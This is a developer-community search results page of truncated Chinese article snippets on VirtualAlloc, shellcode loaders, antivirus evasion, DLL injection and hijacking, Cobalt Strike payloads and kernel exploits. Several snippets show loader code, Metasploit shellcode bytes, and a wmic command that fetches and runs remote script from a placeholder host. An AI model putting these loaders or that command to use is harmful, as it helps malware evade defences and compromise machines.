VirtualAlloc C++,注入了dll,asm - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

免杀初探：python加载shellcode免杀与国内主流杀软大战六个回合

注：以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。...\n"); } 有点c/c++基础的师傅们，就不难理解这段代码。对于小白，这里还是解释一下：是预处理指令。...C函数,c和c++ 编译方式又不太一样，如果在编译时把c的代码用c++方式编译，会产生错误。...故在c++引入c的库时要加extern “C” __declspec(dllexport):用在函数声明前，此前缀是用来实现生成dll文件时可以被导出至dll，即提供调用接口 void TestCtypes...函数就知道了 RtlMoveMemory与2中的memcpy函数一样，这里就不过多解释，想深入了解的可以搜下 create_string_buffer() 将shellcode写入内存中，python的

3.6K1 0

安全视角下的木马免杀技术讨论

Virtualalloc 函数的作用是申请内存，而这里我们之所以用到 virtualalloc 的一个原因是，我们需要设置内存的可执行属性，这一点很重要，如果我们 shellcode 拷贝到的内存块没有执行权限的话...具体的做法是， load kernel32.dll 库，从 kernel32 库中取得 virtualalloc 函数在内存中的地址，然后执行。...Address = GetProcAddress(hModule,"VirtualAlloc");//拿到virtualalloc的地址 _asm { push 40h //push...其实获取kernel32.dll库地址并不一定要通过loadLibrary的，也可以从PEB中进行获取的，可以通过以下代码进行获取： _asm { mov esi, fs:[0x30]//得到PEB地址...0x5 后记当然，随着病毒检测技术的不断改进，现在的病毒检测技术已经引入了一些机器学习的技术了，比如使用二类支持向量机对正常软件和恶意软件进行分类，以及使用多类支持向量机对蠕虫，病毒，木马和正常软件进行分类等等

1.3K1 0

您找到你想要的搜索结果了吗？

是的

没有找到

免杀tips：回调函数的魅力

但是C/C++的此类用法已经被大家所熟知了，效果自然也就慢慢的不好了，所以下面我们将它改造成Csharp版本和Nim版本，来提高我们的免杀效果。首先是Csharp版本。...EnumSystemGeoID( GEOCLASS GeoClass, GEOID ParentGeoId, GEO_ENUMPROC lpGeoEnumProc ); 注：...使用该api无法避免virtualalloc的使用，其api调用链如下： virtualalloc ---> memcpy ---> EnumSystemGeoID 按照之前的文章所说，我们还是需要先进行..., uint size, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", EntryPoint =...import winim/lean 然后就是一样的api的调用了，这里就仅仅展示一下VirtualAlloc吧： let rPtr = VirtualAlloc(

1.7K3 0

windows虚拟内存机制

(如kernel32.dll、ntdll.dll等) 对系统DLL的默认基地址进行调整，防止加载时冲突，触发ReBasing(重定基地址) 注：基地址必须对齐到分配粒度(64KB) Win7下，exe在...生成exe和dll模块时，链接时使用了参数/DYNAMICBASE（启用动态基地址）注：地址空间布局随机化, Address space layout randomization (ASLR)：防范恶意程序对已知地址进行攻击...// 带MEM_COMMIT参数的VirtualAlloc函数起始地址和大小都必须是页面大小的整数倍(4KB)。...注：系统在映射exe或dll文件时会把数据页指定为PAGE_WRITECOPY属性，代码页指定为PAGE_EXECUTE_WRITECOPY属性具体过程： ① 当进程对内存页执行修改操作时，系统会找一个闲置的物理内存页...地址空间布局随机化(Address space layout randomization，ASLR) 微软在Vista系统中引入了名为ASLR的技术，模块每次会被加载到随机位置(伪随机)，防范恶意程序对已知地址进行攻击

1.2K3 0

shellcode免杀「建议收藏」

- 差点跑题把代码贴过来了，留作下次分享（下次一定） 1、回归正题我们先来看一个标准的shellcode加载器源代码：先定义shellcode变量，调用VirtualAlloc...windows.h> using namespace std; int main() { char shellcode[] = "把shellcode粘贴到这里"; LPVOID lpAlloc = VirtualAlloc...NULL; unsigned char shellcode[] = "把shellcode粘贴到这里"; DWORD WINAPI ceshi(LPVOID pParameter) { __asm...注：会主动备份被劫持的文件，原文件命名为.exe~ 0x03 不落地执行shellcode 此处以利用wmic远程文件为例： 1、msf生成的hta链接（最好也做下免杀，...，将自动运行xsl中恶意JScript代码 wmic os get /format:"http://xxx.xx.xx.xx:8080/hta.xsl" 0x04 远程线程注入注：

1.1K2 0

基础免杀手法暴风吸入

explorer.exe explorer.exe c:\windows\system32\calc.exe explorer asdsadasd,"c:\windows\system32\calc.exe" C+...内联汇编加载shellcode c++有强大的内联汇编功能，上次写壳的时候就感受了一番。我们可以通过内联汇编代码加载shellcode.顺便加花什么的，都可以弄。...winhttp.lib") #pragma comment(lib,"user32.lib") int main() { unsigned char buf[] = "shellcode"; _asm...\n"); 也可以用内联汇编完成 BOOL CheckDebug() { DWORD time1, time2; __asm { rdtsc...") ntdll = syscall.MustLoadDLL("ntdll.dll") VirtualAlloc = kernel32.MustFindProc("VirtualAlloc

1.5K1 0

利用Cobalt Strikes Artifact Kit 进行免杀

Artifact Kit的地址为： https://www.cobaltstrike.com/help-artifact-kit 使用之前我们先build一下：查看编译好的字符串：发现以下敏感字符串： VirtualAlloc...artifact64.exe 以注入的为例：配合patch.h 然后把这几个函数的内核函数添加到InlineWhispers的functions.txt中然后把Syscalls.h、syscalls-asm.h...set_key_pointers(buffer); inject(buffer, length, "rundll32.exe"); } #elif _M_X64 #include "syscalls-asm.h...System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll...VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) 这个绕过方法直接拿

2.1K3 0

白加黑保姆教程通杀主流杀软

常见的函数调用约定有：cdecl stdcall fastcall thiscall 其中 cdecl 是 C\C++ 的默认调用约定，stdcall 是 Windows API 的默认调用约定。...用AheadLib来做dll的相关函数导出，但是之前的这个软件导出x64位的dll就会直接闪退，没办法，已经没有更新了在GitHub上找到了一个可以用的，但是导出之后需要把asm相关函数编译成obj，...: { char* v7A = (char*)VirtualAlloc(0, payload_len, 0x3000u, 0x40u); memcpy((void*)v7A, payload...这里就需要来编译asm文件了，参考asm注释里面给的命令，需要注意ml64是vsstudio里面的文件，因为这里没有加入到环境变量中，所以写全路径，编译得到了ffmpeg_jump.obj "E:\C...Visual Studio\VC\Tools\MSVC\14.16.27023\bin\HostX64\x64\ml64" /Fo ffmpeg_jump.obj /c /Cp ffmpeg_jump.asm

6411 0

win32应用程序性能测试-内存篇

kernel上的page，需要先拷贝一份，这样不会影响其它进程使用kernel上的函数，这个操作就会发生一次copy on write错误内存的分配API 1）利用 HeapAlloc 方法或 C/C+...2）利用 VirtualAlloc 方法从系统中直接分配内存。...3查找占用不合理和分配不合理的地方 1例子：某个dll 申请内存不合理分析过程 1）抓取对应exe启动过程中VirtualAlloc。...-heap -Pids 18908 -BufferSize 1024 -MinBuffers 128 -MaxBuffers 128 -stackwalkHeapAlloc+HeapRealloc 注：...Loadlibrary的操作，而且TPKTT.dll的大小正好也是3M多 ?

1.6K8 1

IDA Pro Appcall功能浅析

如果你使用过GDB调试器（Call命令）、VS（Immediate窗口）或者Borland C++ Builder等你应该对于这个功能比较熟悉了。...一种方法是通过_usercall调用约定来描述你的函数：参考如下的函数原型： /* C code */ // eax = esi - edi int __declspec(naked) asm1()...{ __asm { mov eax, esi sub eax, edi ret } } 从IDC函数中调用将会是下面的代码： auto p = ParseType("int __usercall asm1...stdcall *GetModuleHandleW)(LPCWSTR lpModuleName);") hmod = getmodulehandlew(Appcall.unicode("kernel32.dll..._VirtualAlloc") # Now we can Appcall: ptr = virtualalloc(0, Appcall.Consts.MEM_COMMIT, 0x1000, Appcall.Consts.PAGE_EXECUTE_READWRITE

9004 0

分析Cobalt Strike Payload

0xbb5f9ead kernel32.dll_ReadFile 0xe553a458 kernel32.dll_VirtualAlloc 0x315e2145 user32.dll_GetDesktopWindow...0x5fc8d902 ws2_32.dll_recv 0x018b 0xe553a458 kernel32.dll_VirtualAlloc 0x01a5 0x5fc8d902 ws2_32.dll_recv....dll_ExitProcess 0x0324 0xe553a458 kernel32.dll_VirtualAlloc 0x0342 0xe2899612 wininet.dll_InternetReadFile...注:公众号之前分析了power shell的可以去看看 Python解压实现：异或编码 XOR 算法用于三种不同的情况。...注：这个我们之前分析过第二种用法是与 dword 密钥进行异或，用于编码 PE stagers 二进制文件中的原始Payload或信标。

1.7K2 1

免杀|计算地址实现内存免杀

1、创建 ThreadProc 函数 DWORD WINAPI ThreadProc(LPVOID lpParameter) { //申请内存 if ((p = VirtualAlloc...unsigned char shellcode[] = ""; void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE...通常我们可以使用__asm来书写。 __asm { nop ret } 这种方式的好处是不需要调用VirtualAllocAPI，但缺点是很容易识别成特征。...API获取想要获取有关系统硬件和资源的信息，我们可以使用kernel32.dll中的GetSystemInfo函数。...LPVOID lpParameter // thread data ) { //申请内存 if ((p = VirtualAlloc

6091 0

反射Dll注入

DLL，更显安全。...注入器手动搜索DLL的导出表，寻找DLL导出的自主实现的ReflectiveLoader函数。...ReflectiveLoader的工作流程 0x00 ReflectiveLoader做的第一件事就是查找自身所在的DLL具体被写入了哪个位置。...0x01 获取我们需要的API函数有四个API函数是我们需要用的 LoadLibraryA() ：加载DLL所需的导入模块 GetProcAddress()：修正导入表的函数地址 VirtualAlloc...) pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); usCounter

9812 0

免杀杂谈

常见的： c/c++：这种语言做程序，速度快，文件小，可实现的功能很多。也是很普遍传统的一种语言。...比如：VirtualAlloc，更底层是VirtualAllocEx。 VirtualAlloc直接加载一个最简单的直接加载payload，开辟内存空间运行，把载荷放进去。...执行：当目标进程执行到特定的同步点时，即进入了ALERTABLE状态（如进入等待状态、等待用户输入等），执行队列中的用户模式线程得到执行并执行恶意代码。...需要注意的是，APC注入是一种高级的攻击技术，需要深入了解操作系统和漏洞利用原理才能正确实施。在合法场景下使用或研究APC注入，请确保符合法律规定，并遵循合规的安全测试流程。...")), "VirtualAlloc"); 最后使用我们自定义的函数获取进程令牌权限病毒木马想要实现一些关键的系统操作时。

3901 0

科普 | DLL劫持原理与实践

那么最终Windows2003以上以及win7以上操作系统通过“DLL路径搜索目录顺序”和“KnownDLLs注册表项”的机制来确定应用程序所要调用的DLL的路径，之后，应用程序就将DLL载入了自己的内存空间...IDE：vs2017 语言：C\C++ DLL写法不止下面我用的这个写法，还有其它嵌套写法（别问我怎么知道的，为了这篇文章，我踩了N个坑 = =！）...2、然后文件→新建→项目→[已安装 > Visual C++ > Windows桌面]→动态链接库（DLL），生成一个cpp文件。这里我命名为 shiyan_dll ?...0x04 加载使用我们的DLL文件 IDE：vs2017 语言：C\C++ 加载DLL写法不止下面我用的这个写法，还有其它嵌套写法，但是其它写法，能不能被劫持就又是另一回事了。...注：使用该工具，测试软件路径不能有中文。 0x08 本地测试DLL劫持 1、这里，我使用 DLLHi_jacker.py 这款工具。

5.1K4 1

Windows Kernel Exploitation Notes(二)——HEVD Write-What-Where

(0, 0x60, 0x3000, 0x40); ZeroMemory(SC, 0x60); __asm { pushad; mov eax, HalSetSystemInformation_Address...&len); //Allocate Memory PSYSTEM_MODULE_INFORMATION PModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc...(0, 0x60, 0x3000, 0x40); ZeroMemory(SC, 0x60); __asm { pushad; mov ebx, HalSetSystemInformation_Address...PNtSetIntervalProfile NtSetIntervalProfile = (PNtSetIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll...(0, 0x60, 0x3000, 0x40); ZeroMemory(SC, 0x60); __asm { pushad; mov eax, HalSetSystemInformation_Address

5553 0

32位汇编第七讲,混合编程,内联汇编

将此obj文件复制到我们的C/c++的目录下 2.修改C/c++程序,调用我们的增加函数 ?...使用RadAsm编译连接1.asm程序 ?...三丶汇编DLL的使用像我们上面的生成的lib只能给C/C++使用,但是别的程序不见得能使用所以我们写一个汇编的DLL,给C/C++程序使用至于C/C++调用dll,那么有两种方式一种是使用静态方式...,我还得生成DLL 或者生成lib 那么我们突发奇想,可不可以在C/C++中写汇编代码比如我们写个int 3的中断指令 C/C++代码 #include "stdafx.h" typedef int...主要看下面,恢复完寄存器信息之后就开始释放局部变量空间,然后在Debug版本下会检测栈是否平衡,如果不平衡,就弹个错误框,最后ret的时候,因为压入了两个参数还没有平栈所以上面我们需要自己平栈,一个参数

1.6K10 0

从火绒特征码识别到免杀的思考...

xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb" "\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; void main() { __asm...---------------------------------------------- PE文件节表信息文件名:F:\b\C+...我们现在找到msf的源代码： metasploit-framework/block_reverse_tcp.asm at master · rapid7/metasploit-framework (github.com...payloadLen)) { printf("recv error\n"); goto Fail; } char* orig_buffer; orig_buffer = (char*)VirtualAlloc...buffer, payloadLen, 0); buffer += ret; payloadLen -= ret; } while (ret > 0 && payloadLen > 0); __asm

1.7K5 0

Shellcode 技术

通常，这些是VirtualAlloc, VirtualProtect, WriteProcessMemory,CreateRemoteThread等SetThreadContext。...我们不调用它，而是调用它在 Windows 内核中定义的ntdll.dll VirtualAlloc内核等效项。...NtAlocateVirtualMemory这很棒，因为我们绕过了任何用于监控VirtualAlloc对ntdll.dll....如果我们的代码之后在内存中加载一个新副本ntdll.dll，这些 EDR 挂钩将被覆盖。RefleXXion是一个 C++ 库，它实现了MDSec对该技术所做的研究。...WINAPI（例如VirtualAlloc，LoadLibraryA等）将 DLL 及其部分写入内存建立 DLL 导入表，以便 DLL 可以调用ntdll.dll和kernel32.dllWINAPI

1.6K2 0

CC++ 程序反调试方法总结

C/C++ 要实现程序反调试有多种方法，BeingDebugged，NtGlobalFlag，ProcessHeap，CheckRemoteDebuggerPresent，STARTUPINFO，IsDebuggerPresent...lpsetun = SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)ExceptionFilter); LPVOID pBuff = VirtualAlloc...\r\n"); /* Reason 什么事件触发的 DLL_PROCESS_ATTACH 1 DLL_THREAD_ATTACH 2 DLL_THREAD_DETACH 3...MapFileAndCheckSum反破解: 通过使用系统提供的API实现反破解,该函数主要通过检测,PE可选头IMAGE_OPTIONAL_HEADER中的Checksum字段来实现的,一般的EXE默认为0而DLL...中才会启用,当然你可以自己开启,让其支持这种检测. // C/C++ -> 常规 -> 调试信息格式 --> 程序数据库 // 连接器 -> 常规 -> 启用增量链接 -> 否 // 连接器 -> 高级

5171 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭